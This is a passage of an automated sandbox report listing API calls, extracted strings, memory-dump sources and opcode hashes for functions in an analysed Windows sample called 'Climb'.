                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0057097B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215588206-0
                                                                                                                                                                      • Opcode ID: 9eba97fc45dd2fc89b4bc680bfb0809bde0f1ff6621eb6cf0f19393323fab8f8
                                                                                                                                                                      • Instruction ID: dd173acd99eacfbd8d4e388a90884efecc5d5aaeb27068a0320b9d681d9b9108
                                                                                                                                                                      • Opcode Fuzzy Hash: 9eba97fc45dd2fc89b4bc680bfb0809bde0f1ff6621eb6cf0f19393323fab8f8
                                                                                                                                                                      • Instruction Fuzzy Hash: B0414770D08319AADB109FB69C8986EBFE8FF44754B50452AE11CE7291D678D901CF91
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen
                                                                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k[
                                                                                                                                                                      • API String ID: 176396367-3284265457
                                                                                                                                                                      • Opcode ID: 50a8572b50418cbd5cb00e71ecd9edd05ad049fbdd12b7c062ad52df3c6c7fd3
                                                                                                                                                                      • Instruction ID: bee0fb287b7799b06b1f438f9c4bc0e29d3d2f3b40ee12d80c8a31e8536ed974
                                                                                                                                                                      • Opcode Fuzzy Hash: 50a8572b50418cbd5cb00e71ecd9edd05ad049fbdd12b7c062ad52df3c6c7fd3
                                                                                                                                                                      • Instruction Fuzzy Hash: 3BE1E332A00516ABCB149FB4C8626EDFFB5BF54791F10412BE85AE7250DB30AE8D9790
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0
                                                                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00589BA3
                                                                                                                                                                        • Part of subcall function 005880AE: ClientToScreen.USER32(?,?), ref: 005880D4
                                                                                                                                                                        • Part of subcall function 005880AE: GetWindowRect.USER32(?,?), ref: 0058814A
                                                                                                                                                                        • Part of subcall function 005880AE: PtInRect.USER32(?,?,?), ref: 0058815A
                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00589C0C
                                                                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00589C17
                                                                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00589C3A
                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00589C81
                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00589C9A
                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00589CB1
                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00589CD3
                                                                                                                                                                      • DragFinish.SHELL32(?), ref: 00589CDA
                                                                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00589DCD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$(\$(\
                                                                                                                                                                      • API String ID: 221274066-360904246
                                                                                                                                                                      • Opcode ID: 27f2bac42375fa5997ecab80c94d4ea0327df6e5f6a469455e52f27f3611e8d0
                                                                                                                                                                      • Instruction ID: 910a5101e902ab5e03a1aa739736fc27af1753339441319dead2861ddb1c9de2
                                                                                                                                                                      • Opcode Fuzzy Hash: 27f2bac42375fa5997ecab80c94d4ea0327df6e5f6a469455e52f27f3611e8d0
                                                                                                                                                                      • Instruction Fuzzy Hash: 02617B71108305AFC701EF51CC85DABBBE9FF99754F40091EBA91A21A0DB709A49CB62
                                                                                                                                                                      APIs
                                                                                                                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00510436
                                                                                                                                                                        • Part of subcall function 0051045D: InitializeCriticalSectionAndSpinCount.KERNEL32(005C170C,00000FA0,316A37B2,?,?,?,?,00532733,000000FF), ref: 0051048C
                                                                                                                                                                        • Part of subcall function 0051045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00532733,000000FF), ref: 00510497
                                                                                                                                                                        • Part of subcall function 0051045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00532733,000000FF), ref: 005104A8
                                                                                                                                                                        • Part of subcall function 0051045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 005104BE
                                                                                                                                                                        • Part of subcall function 0051045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005104CC
                                                                                                                                                                        • Part of subcall function 0051045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005104DA
                                                                                                                                                                        • Part of subcall function 0051045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00510505
                                                                                                                                                                        • Part of subcall function 0051045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00510510
                                                                                                                                                                      • ___scrt_fastfail.LIBCMT ref: 00510457
                                                                                                                                                                        • Part of subcall function 00510413: __onexit.LIBCMT ref: 00510419
                                                                                                                                                                      Strings
                                                                                                                                                                      • kernel32.dll, xrefs: 005104A3
                                                                                                                                                                      • WakeAllConditionVariable, xrefs: 005104D2
                                                                                                                                                                      • SleepConditionVariableCS, xrefs: 005104C4
                                                                                                                                                                      • InitializeConditionVariable, xrefs: 005104B8
                                                                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00510492
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                      • API String ID: 66158676-1714406822
                                                                                                                                                                      • Opcode ID: cf7e269dbb29e5398962beb176606381a09576d5c976b2f16fc66e7dc6529ac7
                                                                                                                                                                      • Instruction ID: 8f6e32ec6ab5ec5b56a4b59b0116ec6faa1c344ba8cfa8139b7011d9ee70fa34
                                                                                                                                                                      • Opcode Fuzzy Hash: cf7e269dbb29e5398962beb176606381a09576d5c976b2f16fc66e7dc6529ac7
                                                                                                                                                                      • Instruction Fuzzy Hash: 7721F832640B056FEB102BA4AC49F993FE5FF55B61F002515F901A62C0DBF49CC49A64
                                                                                                                                                                      APIs
                                                                                                                                                                      • CharLowerBuffW.USER32(00000000,00000000,0058DCD0), ref: 00564F6C
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00564F80
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00564FDE
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00565039
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00565084
                                                                                                                                                                      • _wcslen.LIBCMT ref: 005650EC
                                                                                                                                                                        • Part of subcall function 0050FD52: _wcslen.LIBCMT ref: 0050FD5D
                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,005B7C10,00000061), ref: 00565188
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                      • API String ID: 2055661098-1000479233
                                                                                                                                                                      • Opcode ID: 741bea1666ede7d1a321c6a843ee308d1b86d485091d786b93c397bce3c8a288
                                                                                                                                                                      • Instruction ID: ff83b9e8ac5b36571caa0c6615660358e92b6cb735d96a65cc4b6c3bb4fa440c
                                                                                                                                                                      • Opcode Fuzzy Hash: 741bea1666ede7d1a321c6a843ee308d1b86d485091d786b93c397bce3c8a288
                                                                                                                                                                      • Instruction Fuzzy Hash: D8B1FE316087029FC710EF29C894A7ABBE5BFA5724F50491DF596C7291EB30DC84CBA2
                                                                                                                                                                      APIs
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0057BBF8
                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0057BC10
                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0057BC34
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0057BC60
                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0057BC74
                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0057BC96
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0057BD92
                                                                                                                                                                        • Part of subcall function 00560F4E: GetStdHandle.KERNEL32(000000F6), ref: 00560F6D
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0057BDAB
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0057BDC6
                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0057BE16
                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 0057BE67
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0057BE99
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0057BEAA
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0057BEBC
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0057BECE
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0057BF43
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2178637699-0
                                                                                                                                                                      • Opcode ID: 4568511c6c3a123c6b42dc86dfef9673b2e56b1241d98d2731a276571f1e3acb
                                                                                                                                                                      • Instruction ID: d743253f52af72e3e8446e49deeab8c3ffbae238c6007b08dcc67810e597c2dd
                                                                                                                                                                      • Opcode Fuzzy Hash: 4568511c6c3a123c6b42dc86dfef9673b2e56b1241d98d2731a276571f1e3acb
                                                                                                                                                                      • Instruction Fuzzy Hash: 37F1F0316043019FDB14EF24D895B6ABFE5BF84314F14895EF9898B2A2CB70EC44DB92
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0058DCD0), ref: 00574B18
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00574B2A
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0058DCD0), ref: 00574B4F
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,0058DCD0), ref: 00574B9B
                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028,?,0058DCD0), ref: 00574C05
                                                                                                                                                                      • SysFreeString.OLEAUT32(00000009), ref: 00574CBF
                                                                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00574D25
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00574D4F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                      • API String ID: 354098117-199464113
                                                                                                                                                                      • Opcode ID: 55ee267ee13dfd2ffa6efce533c1d3aa27d45f9ad4a887ae7335026381801e76
                                                                                                                                                                      • Instruction ID: 9d7fcb02d48c7bd066c0310f59b183562bad797407afe9a409e38479aba24927
                                                                                                                                                                      • Opcode Fuzzy Hash: 55ee267ee13dfd2ffa6efce533c1d3aa27d45f9ad4a887ae7335026381801e76
                                                                                                                                                                      • Instruction Fuzzy Hash: 06121971A00119AFDB14DF94D888EAEBBB9FF45314F24C098E909AB251D731ED46DFA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetMenuItemCount.USER32(005C29C0), ref: 00533F72
                                                                                                                                                                      • GetMenuItemCount.USER32(005C29C0), ref: 00534022
                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00534066
                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0053406F
                                                                                                                                                                      • TrackPopupMenuEx.USER32(005C29C0,00000000,?,00000000,00000000,00000000), ref: 00534082
                                                                                                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0053408E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 36266755-4108050209
                                                                                                                                                                      • Opcode ID: 1c1ebb486acdb5810d5b87be92f8891513154dde1d5931fc0baa7b8ef27ca07c
                                                                                                                                                                      • Instruction ID: 3ddc238faaccd2423836d6a9f906e1bdeaa031e9afdad76bb46d394cf6dbeef9
                                                                                                                                                                      • Opcode Fuzzy Hash: 1c1ebb486acdb5810d5b87be92f8891513154dde1d5931fc0baa7b8ef27ca07c
                                                                                                                                                                      • Instruction Fuzzy Hash: E971E730A44209BFEB219F69DC49FAABFB9FF04364F100216F614AA1E0C779AD14DB55
                                                                                                                                                                      APIs
                                                                                                                                                                      • DestroyWindow.USER32(00000000,?), ref: 00587823
                                                                                                                                                                        • Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A
                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00587897
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 005878B9
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005878CC
                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 005878ED
                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,004F0000,00000000), ref: 0058791C
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00587935
                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0058794E
                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00587955
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0058796D
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00587985
                                                                                                                                                                        • Part of subcall function 004F2234: GetWindowLongW.USER32(?,000000EB), ref: 004F2242
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                      • String ID: 0$tooltips_class32
                                                                                                                                                                      • API String ID: 2429346358-3619404913
                                                                                                                                                                      • Opcode ID: 5b88e698816a2495ff620561d3527325cfab07e176517fbc4740695c033f3112
                                                                                                                                                                      • Instruction ID: 8518998f4413a873f7e3b90f4d1c25aa1eb204727c190f8afdb5872dbba37a3c
                                                                                                                                                                      • Opcode Fuzzy Hash: 5b88e698816a2495ff620561d3527325cfab07e176517fbc4740695c033f3112
                                                                                                                                                                      • Instruction Fuzzy Hash: 1F716570108248AFD721AF18CC48F7ABBE9FB99304F14041EF985A72A1C770E94ADB25
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004F1488,?,00000000,?,?,?,?,004F145A,00000000,?), ref: 004F1865
                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 004F1521
                                                                                                                                                                      • KillTimer.USER32(00000000,?,?,?,?,004F145A,00000000,?), ref: 004F15BB
                                                                                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 005329B4
                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,004F145A,00000000,?), ref: 005329E2
                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,004F145A,00000000,?), ref: 005329F9
                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004F145A,00000000), ref: 00532A15
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00532A27
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                      • String ID: <)\
                                                                                                                                                                      • API String ID: 641708696-4104865746
                                                                                                                                                                      • Opcode ID: e333811c311bbaa1b67d0c2e0e12ed963b3664a0059d260a2bdf0eb66d39832d
                                                                                                                                                                      • Instruction ID: d91bb2f4083375a00a97039d2312d1e69cf50751d1e9f24e5058105a6664199c
                                                                                                                                                                      • Opcode Fuzzy Hash: e333811c311bbaa1b67d0c2e0e12ed963b3664a0059d260a2bdf0eb66d39832d
                                                                                                                                                                      • Instruction Fuzzy Hash: AD619B31501B19EFCB399F14D948B3A7BF1FB90326F10901EE542976B0C778A885EB59
                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0056CEF5
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0056CF08
                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0056CF1C
                                                                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0056CF35
                                                                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0056CF78
                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0056CF8E
                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0056CF99
                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0056CFC9
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0056D021
                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0056D035
                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0056D040
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3800310941-3916222277
                                                                                                                                                                      • Opcode ID: 7c3ed20c90312e875b24590bd957d9d8eba96499dd937361d02e50b40ffa3095
                                                                                                                                                                      • Instruction ID: 9696c339c17db74d9644ca786be7f12f2aff7064f39dc7363134979d370f38bf
                                                                                                                                                                      • Opcode Fuzzy Hash: 7c3ed20c90312e875b24590bd957d9d8eba96499dd937361d02e50b40ffa3095
